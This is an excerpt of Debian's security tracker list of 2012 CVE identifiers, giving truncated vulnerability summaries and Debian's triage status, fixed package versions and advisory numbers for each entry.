RESERVED CVE-2012-5994 RESERVED CVE-2012-5993 RESERVED CVE-2012-5992 (Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco ...) NOT-FOR-US: Cisco CVE-2012-5991 (screens/base/web_auth_custom.html on Cisco Wireless LAN Controller ...) NOT-FOR-US: Cisco CVE-2012-5990 RESERVED CVE-2012-5989 RESERVED CVE-2012-5988 RESERVED CVE-2012-5987 RESERVED CVE-2012-5986 RESERVED CVE-2012-5985 RESERVED CVE-2012-5984 RESERVED CVE-2012-5983 RESERVED CVE-2012-5982 RESERVED CVE-2012-5981 RESERVED CVE-2012-5980 RESERVED CVE-2012-5978 (Multiple directory traversal vulnerabilities in the (1) View ...) NOT-FOR-US: VMware View CVE-2012-5977 (Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and ...) 
{DSA-2605-1} - asterisk 1:1.8.13.1~dfsg-2 (bug #697230) NOTE: http://downloads.asterisk.org/pub/security/AST-2012-015.pdf CVE-2012-5976 (Multiple stack consumption vulnerabilities in Asterisk Open Source ...) {DSA-2605-1} - asterisk 1:1.8.13.1~dfsg-2 (bug #697230) NOTE: http://downloads.digium.com/pub/security/AST-2012-014.pdf CVE-2012-5975 (The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 ...) NOT-FOR-US: Tectia SSH CVE-2012-5974 RESERVED CVE-2012-5973 (CA XCOM Data Transport r11.0 and r11.5 on UNIX and Linux allows remote ...) NOT-FOR-US: CA XCOM Data Transport CVE-2012-5972 (Directory traversal vulnerability in the web server in SpecView 2.5 ...) NOT-FOR-US: SpecView 2.5 CVE-2012-5971 RESERVED CVE-2012-5970 (The Huawei E585 device allows remote attackers to cause a denial of ...) NOT-FOR-US: Huawei device CVE-2012-5969 (Multiple directory traversal vulnerabilities on the Huawei E585 device ...) NOT-FOR-US: Huawei device CVE-2012-5968 (The Huawei E585 device does not validate the status of admin sessions, ...) NOT-FOR-US: Huawei device CVE-2012-5967 (SQL injection vulnerability in menuXML.php in Centreon 2.3.3 through ...) NOT-FOR-US: Centreon CVE-2012-5966 (The restricted telnet shell on the D-Link DSL2730U router allows ...) NOT-FOR-US: D-Link DSL2730U router CVE-2012-5965 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5964 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5963 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5962 (Stack-based buffer overflow in the unique_service_name function in ...) 
{DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5961 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5960 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5959 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5958 (Stack-based buffer overflow in the unique_service_name function in ...) {DSA-2615-1 DSA-2614-1} - libupnp 1:1.6.17-1.2 (bug #699316) - libupnp4 1.8.0~svn20100507-1.2 (bug #699459) CVE-2012-5957 RESERVED CVE-2012-5956 (Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine ...) NOT-FOR-US: ManageEngine AssetExplorer 5.6 CVE-2012-5955 (Unspecified vulnerability in the IBM HTTP Server component 5.3 in IBM ...) NOT-FOR-US: WebSphere CVE-2012-5954 (Unspecified vulnerability in IBM Tivoli Storage Manager for Space ...) NOT-FOR-US: IBM Tivoli Storage Manager CVE-2012-5953 (IBM WebSphere Message Broker 6.1 before 6.1.0.12, 7.0 before 7.0.0.6, ...) NOT-FOR-US: IBM CVE-2012-5952 (IBM WebSphere Message Broker 6.1 before 6.1.0.12, 7.0 before 7.0.0.6, ...) NOT-FOR-US: IBM CVE-2012-5951 (Unspecified vulnerability in IBM Tivoli NetView 1.4, 5.1 through 5.4, ...) NOT-FOR-US: IBM Tivoli NetView CVE-2012-5950 (Multiple cross-site request forgery (CSRF) vulnerabilities in IBM ...) NOT-FOR-US: IBM TRIRIGA Application Platform CVE-2012-5949 (Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA ...) NOT-FOR-US: IBM TRIRIGA Application Platform CVE-2012-5948 (Multiple cross-site scripting (XSS) vulnerabilities in IBM TRIRIGA ...) 
NOT-FOR-US: IBM TRIRIGA Application Platform CVE-2012-5947 (Buffer overflow in the vsflex7l ActiveX control in IBM SPSS ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2012-5946 (Buffer overflow in the c1sizer ActiveX control in C1sizer.ocx in IBM ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2012-5945 (Multiple buffer overflows in the Vsflex8l ActiveX control in IBM SPSS ...) NOT-FOR-US: IBM SPSS SamplePower CVE-2012-5944 RESERVED CVE-2012-5943 (Cross-site scripting (XSS) vulnerability in IBM iNotes 8.5.x before ...) NOT-FOR-US: IBM iNotes CVE-2012-5942 (Cross-site scripting (XSS) vulnerability in the Data Management Portal ...) NOT-FOR-US: IBM Tivoli TADDM CVE-2012-5941 (Cross-site scripting (XSS) vulnerability in the WebAdmin application ...) NOT-FOR-US: IBM CVE-2012-5940 (The WebAdmin application 6.0.5, 6.0.8, and 7.0 before P2 in IBM ...) NOT-FOR-US: IBM CVE-2012-5939 (Cross-site scripting (XSS) vulnerability in Welcome.do in the Data ...) NOT-FOR-US: IBM Tivoli TADDM CVE-2012-5938 (The installation process in IBM InfoSphere Information Server 8.1, ...) NOT-FOR-US: IBM InfoSphere Information Server CVE-2012-5937 (Unspecified vulnerability in the CLA2 server in IBM Gentran ...) NOT-FOR-US: IBM Gentran Integration CVE-2012-5936 RESERVED CVE-2011-5245 (The readFrom function in providers.jaxb.JAXBXmlTypeProvider in ...) NOT-FOR-US: RESTEasy framework for JBoss CVE-2012-5935 RESERVED CVE-2012-5934 RESERVED CVE-2012-5933 RESERVED CVE-2012-5932 (Eval injection vulnerability in the ldapagnt_eval function in ...) NOT-FOR-US: NetIQ Privileged User Manager 2.3.x CVE-2012-5931 (Directory traversal vulnerability in the set_log_config function in ...) NOT-FOR-US: NetIQ Privileged User Manager 2.3.x CVE-2012-5930 (The pa_modify_accounts function in auth.dll in unifid.exe in NetIQ ...) 
NOT-FOR-US: NetIQ Privileged User Manager 2.3.x CVE-2012-5929 RESERVED CVE-2012-5928 RESERVED CVE-2012-5927 RESERVED CVE-2012-5926 RESERVED CVE-2012-5925 RESERVED CVE-2012-5924 RESERVED CVE-2012-5923 RESERVED CVE-2012-5922 RESERVED CVE-2012-5921 RESERVED CVE-2012-5920 (Cross-site scripting (XSS) vulnerability in Google Web Toolkit (GWT) ...) - gwt (bug #691900) [squeeze] - gwt (Vulnerable code not present) CVE-2012-5919 (Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 ...) NOT-FOR-US: havalite CVE-2012-5918 (razorCMS 1.2 allows remote authenticated users to access administrator ...) NOT-FOR-US: razorCMS CVE-2012-5917 (SnackAmp 3.1.3 allows remote attackers to cause a denial of service ...) NOT-FOR-US: SnackAmp CVE-2012-5916 (Neocrome Seditio build 161 allows remote attackers to obtain sensitive ...) NOT-FOR-US: Neocrome Seditio CVE-2012-5915 (Neocrome Seditio build 161 and earlier allows remote attackers to ...) NOT-FOR-US: Neocrome Seditio CVE-2012-5914 (Multiple cross-site scripting (XSS) vulnerabilities in the sed_import ...) NOT-FOR-US: Neocrome Seditio CVE-2012-5913 (Cross-site scripting (XSS) vulnerability in wp-integrator.php in the ...) NOT-FOR-US: Wordpress Integrator plugin CVE-2012-5912 (Multiple SQL injection vulnerabilities in PicoPublisher 2.0 allow ...) NOT-FOR-US: PicoPublisher CVE-2012-5911 (Cross-site scripting (XSS) vulnerability in blogs/blog1.php in ...) NOT-FOR-US: b2evolution CVE-2012-5910 (SQL injection vulnerability in blogs/htsrv/viewfile.php in b2evolution ...) NOT-FOR-US: b2evolution CVE-2012-5909 (SQL injection vulnerability in admin/modules/user/users.php in MyBB ...) NOT-FOR-US: MyBB CVE-2012-5908 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: MyBB CVE-2012-5907 (Directory traversal vulnerability in json.php in TomatoCart 1.2.0 ...) NOT-FOR-US: TomatoCart CVE-2012-5906 (Multiple cross-site scripting (XSS) vulnerabilities in GreenBrowser ...) 
NOT-FOR-US: GreenBrowser CVE-2012-5905 (Buffer overflow in KnFTPd 1.0.0 allows remote authenticated users to ...) NOT-FOR-US: KnFTPd CVE-2012-5904 (Heap-based buffer overflow in IrfanView before 4.33 allows remote ...) NOT-FOR-US: IrfanView CVE-2012-5903 (Cross-site scripting (XSS) vulnerability in Simple Machines Forum ...) NOT-FOR-US: Simple Machine Forum CVE-2012-5902 (Cross-site scripting (XSS) vulnerability in ptk/lib/modal_bookmark.php ...) NOT-FOR-US: DFLabs PTK CVE-2012-5901 (DFLabs PTK 1.0.5 stores data files with predictable names under the ...) NOT-FOR-US: DFLabs PTK CVE-2012-5900 (Multiple SQL injection vulnerabilities in SAMEDIA LandShop 0.9.2 allow ...) NOT-FOR-US: SAMEDIA LandShop CVE-2012-5899 (Cross-site scripting (XSS) vulnerability in admin/action/objects.php ...) NOT-FOR-US: SAMEDIA LandShop CVE-2012-5898 (Cross-site request forgery (CSRF) vulnerability in SAMEDIA LandShop ...) NOT-FOR-US: SAMEDIA LandShop CVE-2012-5897 (The (1) SimpleTree and (2) ReportTree classees in the ARDoc ActiveX ...) NOT-FOR-US: Quest in Trust CVE-2012-5896 (The Annotation Objects Extension ActiveX control in AnnotateX.dll in ...) NOT-FOR-US: Quest in Trust CVE-2012-5895 (Multiple unspecified vulnerabilities in iRODS before 3.1 have unknown ...) NOT-FOR-US: iRODS CVE-2012-5894 (SQL injection vulnerability in hava_post.php in Havalite CMS 1.1.0 and ...) NOT-FOR-US: Havalite CMS CVE-2012-5893 (Unrestricted file upload vulnerability in hava_upload.php in Havalite ...) NOT-FOR-US: Havalite CMS CVE-2012-5892 (Havalite CMS 1.1.0 and earlier stores sensitive information under the ...) NOT-FOR-US: Havalite CMS CVE-2012-5891 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: Dalbum CVE-2012-5890 (The Front End User Registration (sr_feuser_register) extension before ...) NOT-FOR-US: Typo3 extension (sr_feuser_register) CVE-2012-5889 (Cross-site scripting (XSS) vulnerability in the powermail extension ...) 
NOT-FOR-US: Typo3 extension (powermail) CVE-2012-5888 (Cross-site scripting (XSS) vulnerability in Basic SEO Features ...) NOT-FOR-US: Typo3 extension (seo_basics) CVE-2012-5887 (The HTTP Digest Access Authentication implementation in Apache Tomcat ...) - tomcat6 6.0.35-5+nmu1 (bug #692439) - tomcat7 7.0.28-3+nmu1 (bug #692440) CVE-2012-5886 (The HTTP Digest Access Authentication implementation in Apache Tomcat ...) - tomcat6 6.0.35-5+nmu1 (bug #692439) - tomcat7 7.0.28-3+nmu1 (bug #692440) CVE-2012-5885 (The replay-countermeasure functionality in the HTTP Digest Access ...) - tomcat6 6.0.35-5+nmu1 (bug #692439) - tomcat7 7.0.28-3+nmu1 (bug #692440) CVE-2011-5244 (Multiple off-by-one errors in the (1) token and (2) linetoken ...) {DSA-2357-1} - evince 2.32.0-1 NOTE: This issue was already fixed in DSA-2357-1 by shipping the correct fix from the start CVE-2012-5884 (The User.get method in Bugzilla/WebService/User.pm in Bugzilla 4.3.2 ...) - bugzilla (low) [squeeze] - bugzilla (vulnerable code not present in 3.x) - bugzilla4 (bug #669643) CVE-2012-5883 (Cross-site scripting (XSS) vulnerability in the Flash component ...) - yui3 - yui 2.9.0.dfsg.0.1-0.1 (bug #693608) - icinga-web 1.7.1+dfsg2-6 (bug #694641) CVE-2012-5882 (Cross-site scripting (XSS) vulnerability in the Flash component ...) - yui3 - yui 2.9.0.dfsg.0.1-0.1 (bug #693608) - icinga-web 1.7.1+dfsg2-6 (bug #694641) CVE-2012-5881 (Cross-site scripting (XSS) vulnerability in the Flash component ...) - yui3 - yui 2.9.0.dfsg.0.1-0.1 (bug #693608) - icinga-web 1.7.1+dfsg2-6 (bug #694641) CVE-2012-5880 RESERVED CVE-2012-5879 (An ActiveX control in McHealthCheck.dll in McAfee Virtual Technician ...) NOT-FOR-US: McAfee Virtual Technician CVE-2012-5878 RESERVED CVE-2012-5877 RESERVED CVE-2012-5876 RESERVED CVE-2012-5875 (Firefly Media Server 1.0.0.1359 allows remote attackers to cause a ...) NOT-FOR-US: Firefly Media Server CVE-2012-5874 (Multiple SQL injection vulnerabilities in the (1) ...) 
NOT-FOR-US: Elite Bulletin Board CVE-2012-5873 RESERVED CVE-2012-5872 RESERVED CVE-2012-5871 RESERVED CVE-2012-5870 RESERVED CVE-2012-5869 RESERVED CVE-2012-5868 (WordPress 3.4.2 does not invalidate a wordpress_sec session cookie ...) - wordpress (bug #696868) CVE-2012-5867 RESERVED CVE-2012-5866 RESERVED CVE-2012-5865 RESERVED CVE-2012-5864 (The management web pages on the Sinapsi eSolar Light Photovoltaic ...) NOT-FOR-US: Sinapsi eSolar Light Photovoltaic System Monitor CVE-2012-5863 (ping.php on the Sinapsi eSolar Light Photovoltaic System Monitor (aka ...) NOT-FOR-US: Sinapsi eSolar Light Photovoltaic System Monitor CVE-2012-5862 (login.php on the Sinapsi eSolar Light Photovoltaic System Monitor (aka ...) NOT-FOR-US: Sinapsi eSolar Light Photovoltaic System Monitor CVE-2012-5861 (Multiple SQL injection vulnerabilities on the Sinapsi eSolar Light ...) NOT-FOR-US: Sinapsi eSolar Light Photovoltaic System Monitor CVE-2012-5860 (Unspecified vulnerability on Oberthur ID-One COSMO 5.2, 5.2a, and 64 ...) NOT-FOR-US: ID-One COSMO CVE-2012-XXXX [xscreensaver lock bypass] - libpam-rsa (low; bug #693087) CVE-2012-5859 (Samsung Kies Air 2.1.207051 and 2.1.210161 allows remote attackers to ...) NOT-FOR-US: Samsung Kies Air CVE-2012-5858 (Samsung Kies Air 2.1.207051 and 2.1.210161 relies on the IP address ...) NOT-FOR-US: Samsung Kies Air CVE-2012-5857 RESERVED CVE-2012-5856 (Cross-site scripting (XSS) vulnerability in the Uk Cookie (aka ...) NOT-FOR-US: Wordpress plugin (uk cookie) CVE-2012-5855 RESERVED - vlc (unimportant) NOTE: Harmless crasher without security relevance CVE-2012-5853 RESERVED CVE-2012-5852 RESERVED CVE-2012-5851 (html/parser/XSSAuditor.cpp in WebCore in WebKit, as used in Google ...) 
- chromium-browser (unimportant) - webkit (unimportant) NOTE: https://bugs.webkit.org/show_bug.cgi?id=92692 NOTE: Incomplete mitigation feature, not a security vulnerability per se CVE-2012-5850 RESERVED CVE-2012-5849 RESERVED CVE-2012-5854 (Heap-based buffer overflow in WeeChat 0.3.6 through 0.3.9 allows ...) - weechat 0.3.9.1-1 (bug #693026) [wheezy] - weechat 0.3.8-1+deb7u1 [squeeze] - weechat (Vulnerable code not present) CVE-2012-5848 RESERVED CVE-2012-5847 RESERVED CVE-2012-5846 RESERVED CVE-2012-5845 RESERVED CVE-2012-5844 RESERVED CVE-2012-5843 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-5842 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-5841 (Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5840 (Use-after-free vulnerability in the nsTextEditorState::PrepareEditor ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5839 (Heap-based buffer overflow in the ...) 
- iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5838 (The copyTexImage2D implementation in the WebGL subsystem in Mozilla ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-5837 (The Web Developer Toolbar in Mozilla Firefox before 17.0 executes ...) - iceweasel (Doesn't affect the ESR series, only releases from experimental) CVE-2012-5836 (Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-5835 (Integer overflow in the WebGL subsystem in Mozilla Firefox before ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5834 RESERVED CVE-2012-5833 (The texImage2D implementation in the WebGL subsystem in Mozilla ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5832 RESERVED CVE-2012-5831 RESERVED CVE-2012-5830 (Use-after-free vulnerability in Mozilla Firefox before 17.0, Firefox ...) 
- iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-5829 (Heap-based buffer overflow in the nsWindow::OnExposeEvent function in ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-5828 RESERVED CVE-2012-5827 (Joomla! 2.5.x before 2.5.8 and 3.0.x before 3.0.2 allows remote ...) - joomla (bug #571794) CVE-2012-5826 RESERVED CVE-2011-5243 (TwitterOAuth does not verify that the server hostname matches a domain ...) NOT-FOR-US: TwitterOAuth CVE-2011-5242 (tmhOAuth before 0.61 does not verify that the server hostname matches ...) NOT-FOR-US: tmhOAuth CVE-2011-5241 (Services_Twitter 0.6.3 does not verify that the server hostname ...) NOT-FOR-US: PEAR module for Twitter CVE-2011-5240 (Magento 1.5 and 1.6.2 does not verify that the server hostname matches ...) NOT-FOR-US: Magento CVE-2011-5239 (CiviCRM 4.0.5 and 4.1.1 does not verify that the server hostname ...) NOT-FOR-US: CiviCRM NOTE: RFP #645700 CVE-2011-5238 (google-checkout-php-sample-code before 1.3.2 does not verify that the ...) NOT-FOR-US: google-checkout-php-sample-code CVE-2011-5237 (PayPal WPS ToolKit does not verify that the server hostname matches a ...) NOT-FOR-US: PayPal WPS ToolKit CVE-2011-5236 (Moneris eSelectPlus 2.03 PHP API does not verify that the server ...) NOT-FOR-US: Moneris eSelectPlus 2.03 PHP API CVE-2012-5825 (Tweepy does not verify that the server hostname matches a domain name ...) - tweepy (low; bug #692444) [wheezy] - tweepy (Minor issue) CVE-2012-5824 (Trillian 5.1.0.19 does not verify that the server hostname matches a ...) NOT-FOR-US: Trillian CVE-2012-5823 (Open Source Classifieds does not verify that the server hostname ...) NOT-FOR-US: Open Source Classifieds CVE-2012-5822 (The contribution feature in Zamboni does not verify that the server ...) 
NOT-FOR-US: Zamboni CVE-2012-5821 (Lynx does not verify that the server's certificate is signed by a ...) - lynx-cur 2.8.8dev.15-1 (low; bug #692443) [squeeze] - lynx-cur (Minor issue) [wheezy] - lynx-cur (Minor issue) CVE-2012-5820 (The developer-account sample code in Google AdMob does not verify that ...) NOT-FOR-US: Google AdMob CVE-2012-5819 (FilesAnywhere does not verify that the server hostname matches a ...) NOT-FOR-US: FilesAnywhere CVE-2012-5818 (ElephantDrive does not verify that the server hostname matches a ...) NOT-FOR-US: ElephantDrive CVE-2012-5817 (Codehaus XFire 1.2.6 and earlier, as used in the Amazon EC2 API Tools ...) NOT-FOR-US: Codehaus XFire CVE-2012-5816 (AOL Instant Messenger (AIM) 1.0.1.2 does not verify that the server ...) NOT-FOR-US: AOL Instant Messenger CVE-2012-5815 (The Rackspace app 2.1.5 for iOS does not verify that the server ...) NOT-FOR-US: Rackspace app for iOS CVE-2012-5814 (Weberknecht, as used in GitHub Gaug.es and other products, does not ...) NOT-FOR-US: Weberknecht CVE-2012-5813 (The Android_Pusher library for Android does not verify that the server ...) NOT-FOR-US: Android app/lib CVE-2012-5812 (The ACRA library for Android does not verify that the server hostname ...) NOT-FOR-US: Android app/lib CVE-2012-5811 (The Breezy application for Android does not verify that the server ...) NOT-FOR-US: Android app/lib CVE-2012-5810 (The Chase mobile banking application for Android does not verify that ...) NOT-FOR-US: Android app/lib CVE-2012-5809 (The Groupon Redemptions application for Android does not verify that ...) NOT-FOR-US: Android app/lib CVE-2012-5808 (The LinkPoint module in Zen Cart does not verify that the server ...) NOT-FOR-US: Zen Cart module CVE-2012-5807 (The Authorize.Net eCheck module in Zen Cart does not verify that the ...) NOT-FOR-US: Zen Cart module CVE-2012-5806 (The PayPal Payments Pro module in Zen Cart does not verify that the ...) 
NOT-FOR-US: Zen Cart module CVE-2012-5805 (The PayPal IPN functionality in Zen Cart does not verify that the ...) NOT-FOR-US: Zen Cart module CVE-2012-5804 (The CyberSource module in Ubercart does not verify that the server ...) NOT-FOR-US: Ubercart module CVE-2012-5803 (The Authorize.Net module in Ubercart does not verify that the server ...) NOT-FOR-US: Ubercart module CVE-2012-5802 (The PayPal module in Ubercart does not verify that the server hostname ...) NOT-FOR-US: Ubercart module CVE-2012-5801 (The PayPal module in PrestaShop does not verify that the server ...) NOT-FOR-US: PrestaShop module CVE-2012-5800 (The eBay module in PrestaShop does not verify that the server hostname ...) NOT-FOR-US: PrestaShop module CVE-2012-5799 (The Canada Post (aka CanadaPost) module in PrestaShop does not verify ...) NOT-FOR-US: PrestaShop module CVE-2012-5798 (The PayPal Pro PayFlow EC module in osCommerce does not verify that ...) NOT-FOR-US: osCommerce module CVE-2012-5797 (The PayPal Pro PayFlow module in osCommerce does not verify that the ...) NOT-FOR-US: osCommerce module CVE-2012-5796 (The PayPal Pro module in osCommerce does not verify that the server ...) NOT-FOR-US: osCommerce module CVE-2012-5795 (The PayPal Express module in osCommerce does not verify that the ...) NOT-FOR-US: osCommerce module CVE-2012-5794 (The MoneyBookers module in osCommerce does not verify that the server ...) NOT-FOR-US: osCommerce module CVE-2012-5793 (The Authorize.Net module in osCommerce does not verify that the server ...) NOT-FOR-US: osCommerce module CVE-2012-5792 (The Sage Pay Direct module in osCommerce does not verify that the ...) NOT-FOR-US: osCommerce module CVE-2012-5791 (PayPal Invoicing does not verify that the server hostname matches a ...) NOT-FOR-US: PayPal Invoicing CVE-2012-5790 (PayPal Payments Standard PHP Library 20120427 does not verify that the ...) 
	NOT-FOR-US: PayPal Payments Standard PHP Library
CVE-2012-5789 (PayPal Payments Standard PHP Library before 20120427 does not verify ...)
	NOT-FOR-US: PayPal Payments Standard PHP Library
CVE-2012-5788 (The PayPal IPN utility does not verify that the server hostname ...)
	NOT-FOR-US: The PayPal IPN utility
CVE-2012-5787 (The PayPal merchant SDK does not verify that the server hostname ...)
	NOT-FOR-US: The PayPal merchant SDK
CVE-2012-5786 (The wsdl_first_https sample code in ...)
	NOT-FOR-US: Apache CXF
CVE-2012-5785 (Apache Axis2/Java 1.6.2 and earlier does not verify that the server ...)
	NOT-FOR-US: Axis2/Java
	NOTE: Axis2/C is packaged as axis2c, but that is different software.
CVE-2012-5784 (Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal ...)
	- axis 1.4-16.1 (bug #692650)
CVE-2012-5783 (Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments ...)
	- commons-httpclient 3.1-10.1 (bug #692442)
CVE-2012-5782 (Amazon Flexible Payments Service (FPS) PHP Library does not verify ...)
	NOT-FOR-US: Amazon Flexible Payments Service
CVE-2012-5781 (Amazon Elastic Load Balancing API Tools does not verify that the ...)
	NOT-FOR-US: Amazon Elastic Load Balancing API Tools
CVE-2012-5780 (The Amazon merchant SDK does not verify that the server hostname ...)
	NOT-FOR-US: The Amazon merchant SDK
CVE-2012-5779
	RESERVED
CVE-2012-5778
	RESERVED
CVE-2012-5777 (Eval injection vulnerability in the ReplaceListVars function in the ...)
	NOT-FOR-US: EmpireCMS
CVE-2012-5776
	RESERVED
CVE-2012-5775
	RESERVED
CVE-2012-5774
	RESERVED
CVE-2012-5773
	RESERVED
CVE-2012-5772
	RESERVED
CVE-2012-5771
	RESERVED
CVE-2012-5770 (The SSL configuration in IBM Tivoli Application Dependency Discovery ...)
	NOT-FOR-US: IBM
CVE-2012-5769 (IBM SPSS Modeler 14.0, 14.1, 14.2 through FP3, and 15.0 before FP2 ...)
	NOT-FOR-US: IBM SPSS Modeler
CVE-2012-5768
	RESERVED
CVE-2012-5767 (Unspecified vulnerability in the web interface on the IBM TS3500 Tape ...)
	NOT-FOR-US: IBM TS3500 Tape Library
CVE-2012-5766
	RESERVED
CVE-2012-5765 (The Web Client (aka CQ Web) in IBM Rational ClearQuest 7.1.2.x before ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-5764
	RESERVED
CVE-2012-5763 (Cross-site request forgery (CSRF) vulnerability in the WebAdmin ...)
	NOT-FOR-US: IBM
CVE-2012-5762 (Cross-site scripting (XSS) vulnerability in the WebAdmin application ...)
	NOT-FOR-US: IBM
CVE-2012-5761 (Cross-site scripting (XSS) vulnerability in the WebAdmin application ...)
	NOT-FOR-US: IBM
CVE-2012-5760 (SQL injection vulnerability in the WebAdmin application 6.0.5, 6.0.8, ...)
	NOT-FOR-US: IBM
CVE-2012-5759 (The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and ...)
	NOT-FOR-US: Websphere
CVE-2012-5758 (The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and ...)
	NOT-FOR-US: Websphere
CVE-2012-5757 (Cross-site scripting (XSS) vulnerability in the Web Client in IBM ...)
	NOT-FOR-US: IBM Rational ClearQuest
CVE-2012-5756 (The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and ...)
	NOT-FOR-US: Websphere
CVE-2012-5755
	RESERVED
CVE-2012-5754
	RESERVED
CVE-2012-5753
	RESERVED
CVE-2012-5752
	RESERVED
CVE-2012-5751
	RESERVED
CVE-2012-5750
	RESERVED
CVE-2012-5749
	RESERVED
CVE-2012-5748
	RESERVED
CVE-2012-5747
	RESERVED
CVE-2012-5746
	RESERVED
CVE-2012-5745
	RESERVED
CVE-2012-5744
	RESERVED
CVE-2012-5743
	RESERVED
CVE-2012-5742
	RESERVED
CVE-2012-5741
	RESERVED
CVE-2012-5740
	RESERVED
CVE-2012-5739
	RESERVED
CVE-2012-5738
	RESERVED
CVE-2012-5737
	RESERVED
CVE-2012-5736
	RESERVED
CVE-2012-5735
	RESERVED
CVE-2012-5734
	RESERVED
CVE-2012-5733
	RESERVED
CVE-2012-5732
	RESERVED
CVE-2012-5731
	RESERVED
CVE-2012-5730
	RESERVED
CVE-2012-5729
	RESERVED
CVE-2012-5728
	RESERVED
CVE-2012-5727
	RESERVED
CVE-2012-5726
	RESERVED
CVE-2012-5725
	RESERVED
CVE-2012-5724
	RESERVED
CVE-2012-5723
	RESERVED
CVE-2012-5722
	RESERVED
CVE-2012-5721
	RESERVED
CVE-2012-5720
	RESERVED
CVE-2012-5719
	RESERVED
CVE-2012-5718
	RESERVED
CVE-2012-5717 (Cisco Adaptive Security Appliances (ASA) devices with firmware 8.x ...)
	NOT-FOR-US: Cisco Adaptive Security Appliances
CVE-2012-5716
	RESERVED
CVE-2012-5715
	RESERVED
CVE-2012-5714
	RESERVED
CVE-2012-5713
	RESERVED
CVE-2012-5712
	RESERVED
CVE-2012-5711
	RESERVED
CVE-2012-5710
	RESERVED
CVE-2012-5709
	RESERVED
CVE-2012-5708
	RESERVED
CVE-2012-5707
	RESERVED
CVE-2012-5706
	RESERVED
CVE-2012-5705 (Cross-site scripting (XSS) vulnerability in the settings page ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
CVE-2012-5704 (The Hotblocks module 6.x-1.x before 6.x-1.8 for Drupal allows remote ...)
	NOT-FOR-US: Drupal addon not packaged in Debian
